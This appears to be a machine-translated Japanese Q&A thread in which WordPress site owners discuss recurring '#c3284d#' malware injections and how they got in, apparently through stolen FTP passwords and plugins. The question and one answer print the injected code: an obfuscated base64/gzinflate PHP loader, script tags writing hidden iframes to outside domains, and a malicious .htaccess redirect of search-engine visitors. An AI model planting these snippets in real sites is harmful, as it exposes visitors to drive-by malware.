6

ここ数日、私の Web サイトは繰り返し iframe 攻撃の標的になっています。コードは、主に PHP および Javascript ページに追加されます。次に、コードは PHP base 64 でエンコードされます。例を参照してください (中和するためにコードを少し変更しました)。

#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8    VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#

このデコードされたものは次のようになります。

<script type="text/javascript">
    document.write(
        '<iframe src="http://opticmoxie.com/xxxxxxx.php"     
         name="Twitter" scrolling="auto" frameborder="no" 
         align="center" height="2" width="2"></iframe>'
    );

共通点の 1 つは、すべてのコードに「#c3284d#」というコメントが含まれているため、悪意のあるコードを追跡することは難しくありません。でも手間がかかる…

私たちは Gradwell (英国) の共有サーバーにいますが、特に役に立ちませんでした。問題は、この問題が繰り返されないようにするにはどうすればよいかということです。私は MySQL インジェクション攻撃を認識しており、PHP の mysql_real_escape_string を使用してそのような攻撃を防御しています。

サイトは PHP と MySQL ドライブです。MySQLFTP を使用し、SSH アクセス用のシェル アカウントを持っています。私たちはWordpressを使用しています(プラグインを無効にした最新のアップデート)。

4

8 に答える 8

1

私は同じ問題を抱えていましたが、Wordpressサイトに行きました。

PHPコードを実行できるプラグインを1つ使用しているため、ウィジェットを介してサイトが感染したと思います。

私の最善の解決策は次のとおりです。

  • 疑わしいウィジェットを削除します。
  • 1つの感染したファイルの日時を参照してください(私の場合:header.php);
  • 感染したファイルをすべてクリアします(私の場合、サイトのバックアップがあります)。
  • その時点で疑わしいIPをログファイルで検索します(ブラックリストで見つかったIPを検索します)。
  • 疑わしいIPを禁止するプラグインを1つインストールします。

その瞬間から問題はなくなりました。これがお役に立てば幸いです。

于 2012-07-27T14:36:48.373 に答える
1

私は同じ問題を抱えていて、彼らが侵入するために使用した方法がハッキングされたftpパスワードであることがわかりました。

これはCPHulkブルートフォース保護が有効になっているcPanelサーバーで実行されていますが、ハッカーが何千もの異なる侵害されたホストを介してブルートフォース攻撃を試みていることがわかりました。

幸い、アップロードされたすべてのファイルのログがあったので、バックアップからこれらのファイルを復元するスクリプトを作成しました。

次に、アカウントがロックされる前に必要な失敗した試行の数を減らすことで、cPanelブルートフォース保護レベルを上げました。

于 2013-02-14T00:47:48.787 に答える
1

私が管理しているすべてのWordpressサイトで同じ問題がありました。感染源が見つかりませんでした。コンピューターにワームがあったか、すべてのサイトにインストールしたプラグインに違いないでしょう。

WP-Better セキュリティ プラグイン ログで変更されたすべてのファイルを見つけ、追加の感染コードを削除し、感染源であるすべてのファイルで chmod 444 を作成した後.

邪悪な iframes/htacess やその他のものの 1 か月以来、今は自由です。

于 2012-12-21T21:45:35.967 に答える
1

同じ問題がありました。FTP サーバーのアクセス ログは、ハッキングされた FTP パスワードを使用して変更が行われたことを示していました。

于 2012-07-14T17:46:28.373 に答える
1

多くの異なるドメインで、同じ問題と、ハッキングされたさまざまなファイルの亜種があります。私が気付く共通点の 1 つは、Wordpress です。これらのサーバーの多くにワードプレスがあり、それが一般的な原因だと思います. すべてのワードプレス アカウントを更新し、すべてのドメイン アカウントのすべての pwords を変更しました。問題がまだ完全に解決されているかどうかはわかりません。

于 2012-07-19T22:07:19.070 に答える
0

私も同じ問題を抱えています。私の場合、追加されたコードは

<!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

さらに、以下のような .htaccess ファイルがあります。

> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER}
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php
> [R=301,L] </IfModule>
> #/c3284d#

この問題に関する 2 つの記事を見つけ まし

それが役に立てば幸い

于 2012-07-11T17:56:33.540 に答える